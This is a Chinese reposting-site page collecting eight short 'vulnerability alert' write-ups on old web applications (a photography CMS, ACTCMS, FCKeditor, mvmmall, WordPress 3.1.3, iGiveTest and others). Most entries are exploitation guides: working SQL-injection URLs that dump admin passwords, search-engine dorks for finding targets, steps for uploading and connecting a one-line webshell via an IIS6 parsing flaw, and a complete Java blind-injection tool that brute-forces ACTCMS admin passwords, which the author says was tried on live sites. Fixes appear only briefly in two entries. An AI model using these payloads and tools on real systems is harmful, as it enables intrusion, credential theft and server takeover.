魔方网络摄影系统注入漏洞及利用漏洞预警

时间:2022年12月15日

/

来源:脏话出警小分队

/

编辑:本站小编

收藏本文

下载本文

以下是小编收集整理的魔方网络摄影系统注入漏洞及利用漏洞预警,本文共8篇,希望对大家有所帮助。本文原稿由网友“脏话出警小分队”提供。

篇1:魔方网络摄影系统注入漏洞及利用漏洞预警

魔方网络摄影系统

注入点:/news.php?action=detail&id=[SQLi]

利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的

第二步,后台地址为/admin.php,进去管理后台试图拿webshell

第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马

第四步, 直接连接一句话 -_,

篇2:魔方网络摄影系统注入漏洞及利用和修复

魔方网络摄影系统

注入点: /news.php?action=detail&id=[SQLi]

利用方法,第一步通过注入点获取管理员账号和密码,密码居然是明文的

第二步,后台地址为/admin.php,进去管理后台试图拿webshell

第三步,通过iis6解析漏洞,上传.asp;.jpg一句话木马

第四步,菜刀连接一句话木马

第五步,进一步提权,拿下服务器,。。

--------------------------------------------------------------------------------

应该是统一建站的 连mysql 密码都是明文 无语啊.... 估计见一个死一个 不是密码为空 就是明文getshell 有时间 看看有没有其他的包含漏洞cgi过滤 太恶心了

其实cgi 嘛你懂的像这个 /data/attachment/1.php;1.jpg

不一定有效

FastCGI Error

The FastCGI Handler was unable to process the request.

Error Details:

Could not find entry for “jpg” on site 236134254 in [Types] section.

Error Number: 1413 (0x80070585).

Error Description: ÎTD§Ë÷òy¡£

HTTP Error 500 - Server Error.

Internet Information Services (IIS)

提供修复方案:

过滤news.php页面参数输入,

修复iis6解析漏洞

篇3:华讯网络管理系统注入漏洞利用漏洞预警

华讯网络管理系统存在SQL注入,可获取管理员用户密码信息,

关键字:inurl:chk_case.asp

漏洞测试:

www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin

默认后台:

www.site.com/admin/

篇4:ACTCMS注入漏洞漏洞预警

一款ASP的CMS程序,用的人并不是太多。

GOOGLE一下关键字“Copyright @ www.actcms.com” ,不是太多。

今天看了一下代码。

基本上所有的参数全都被过滤掉了。。

不过投票那里出了点小问题。。

在/plus/vote/vote.asp页面。

代码如下:

ASP/Visual Basic代码

....

if request(“voted”).count=0 then

response.write “”

response.end

end if

for i=1 to request(“voted”).count

actcms.actexe(“Update vote_act set VoteNum=VoteNum+1 where id=”&request(“voted”)(i))

next

....

response.Redirect “index.asp?id=”&id&“”

id直接从request里面取的,不过因为前面是update ,再加上后面的response.redirect,利用起来比较麻烦。而且这是一个一般工具无法识别的注入点。因为无论我们构造什么语句在后面,它都会跳到index.asp页面。

唯一有变化的就是当我们构造的注入条件正确的时候,票数会增加。 手工利用起来相当的麻烦,试了现在的那些注入工具明小子,pangolin之类的也不能注入,所以我自己动手写了一个简单的程序 ,因为只会JAVA,所以就用JAVA写了。。写的比较粗糙。用的穷举法,这样写着比较方便。速度慢就慢吧。

代码如下:

Java代码

import java.io.BufferedReader;

import java.io.InputStreamReader;

import java.net.URL;

import java.net.URLConnection;

import java.util.regex.Matcher;

import java.util.regex.Pattern;

public class ActCmsGetPwd {

public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',

'9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',

'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',

'z' };

public static String siteurl = “”;

public static int voteid = 1;

public static String charset = “”;

public static void main(String[] args) throws Exception {

if (args.length < 4) {

System.out

.println(“usage:java ActCmsGetPwd    ”);

System.out.println(“siteurl:目标站点”);

System.out.println(“voteid:投票id”);

System.out

.println(“totalVoteNum:当前的投票人数,请自行查看plus/vote/index.asp?id=”);

System.out.println(“charset:目标站点所用的ACTCMS的字符集,请自行查看网页源代码”);

System.out.println(“eg:java ActCmsGetPwd www.abc.com/ 1 15 gb2312”);

return;

}

siteurl = args[0];

voteid = Integer.parseInt(args[1]);

int preVoteNum = Integer.parseInt(args[2]);

charset = args[3];

System.out.println(“Code by Ninty , QQ 3191864”);

System.out.print(“password is :”);

for (int i = 1; i <= 16; i++) {

System.out.print(send(i, 0, preVoteNum));

preVoteNum++;

}

System.out.println(“\\nDone!”);

}

public static char send(int a, int b, int preVoteNum) throws Exception {

String sql = “%20and%20(select%20top%201%20mid(password,” + a

+ “,1)%20from%20admin_act%20where%20supertf%20=1)%20=%20'” + arr[b] + “'”;

URL u = new URL(siteurl

+ “/Plus/vote/vote.asp?dopost=send&id=”+voteid+“&ismore=0&voted=3” + sql);

URLConnection conn = u.openConnection;

BufferedReader reader = new BufferedReader(new InputStreamReader(conn

.getInputStream(),charset));

String str = reader.readLine();

while (str != null) {

if (str.indexOf(“ 投票人数:”) != -1) {

break;

}

str = reader.readLine();

}

reader.close();

if (!isRight(str, preVoteNum)) {

return send(a, ++b, preVoteNum);

} else {

return arr[b];

}

}

public static boolean isRight(String str, int preVoteNum) {

if (str == null) {

System.out.println(“无法读取!”);

System.exit(0);

}

Pattern pat = Pattern.compile(“人数:(\\\\d+)”);

Matcher mat = pat.matcher(str);

if (mat.find()) {

int num = Integer.parseInt(mat.group(1));

if (num != preVoteNum) {

return true;

}

}

return false;

}

}

下面是已经编译好的 class文件,编译环境JDK6,

直接运行就好。

actcmsgetpwd.class

在网上找了几个站测试了一下,都可以得到超级管理员的密码,不过官网好像不存在这个漏洞。

篇5:fckeditor漏洞利用漏洞预警

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马,利用路径解析漏洞,也可以直接上传ASP木马,

fckeditor漏洞利用漏洞预警

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如:

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

篇6:mvmmall网店商城系统注入漏洞漏洞预警

mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上,

代码如下:

require_once ‘include/common.inc.php’;

require_once ROOTPATH.’header.php’;

if($action!=’search’){

$search_key = ”;

if (isset($ps_search))

{  //省略一堆东西

$tag_ids = array; //在if里

//继续省略

while ($row = $db->fetch_array($result)) {

$tag_ids[] = $row['goods_id'];

} //也是在if里

}

//省略一堆东西

} //结束if里的东西

//商品标签搜索

$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入

$tag_search = implode(‘,’,dhtmlchars($tag_ids));   //dhtmlchars过滤HTML标签不用理会

$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!

//省略无关东西

$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….

$total_count = $db->counter($mvm_goods_table,$search_sql);

用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了,

测试EXP:

www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23

BY:www.dj4now.com/

篇7:WordPress 3.1.3 注入漏洞漏洞预警

第一个:

get_terms过滤器文件中声明taxonomy.php 没有正确验证用户输入,允许攻击者构建任意sql命令,可用于盲注,

以下网址可用于执行SQL盲注攻击

[SQL injection] sql注入

localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL

injection]&order=[SQL injection]

localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL

injection]&order=[SQL injection]

localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL

injection]&order=[SQL injection]

第二个:

get_bookmarks()函数中声明的

bookmark.php文件没有正确验证用户输入

这个也可以盲注

以下网址可用于执行SQL盲注攻击

localhost/wp-admin/link-manager.php?orderby=[SQLinjection]&order=[SQL injection]

WordPress已经确认漏洞存在了

漏洞解决:

升级到3.1.4 或者 3.2-RC3版本,

篇8:iGiveTest 2.1.0注入漏洞漏洞预警

Version: <= 2.1.0

# Homepage: iGiveTest.com/

谷歌关键字: “Powered by iGiveTest”

随便注册一个帐号,

iGiveTest 2.1.0注入漏洞漏洞预警

然后暴管理员帐号和密码

www.xxxx.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1

南方数据网站管理系统注入漏洞&后台拿WebShell漏洞预警

ServU多个安全漏洞漏洞预警

网络精英培训网的漏洞

网站常见漏洞 文件上传漏洞漏洞预警

启航通信企业建站CMS系统v1.1 0day漏洞预警

下载魔方网络摄影系统注入漏洞及利用漏洞预警(共8篇)
魔方网络摄影系统注入漏洞及利用漏洞预警.doc
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档
点击下载本文文档